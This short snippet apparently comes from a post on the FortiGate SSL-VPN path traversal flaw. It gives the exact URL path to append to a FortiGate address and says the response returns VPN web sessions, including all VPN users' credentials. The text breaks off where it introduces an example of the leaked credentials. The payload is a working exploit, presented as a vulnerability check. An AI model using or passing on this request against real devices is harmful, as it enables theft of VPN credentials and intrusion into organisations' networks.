To check if the Fortigate is vulnerable you can just have 
to append the following path to the fortigate url:
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession 

you will then receive the web-sessions of the FortiGate VPN including all the credentials of the VPN users. 
The following is an example of how these credentials are shown: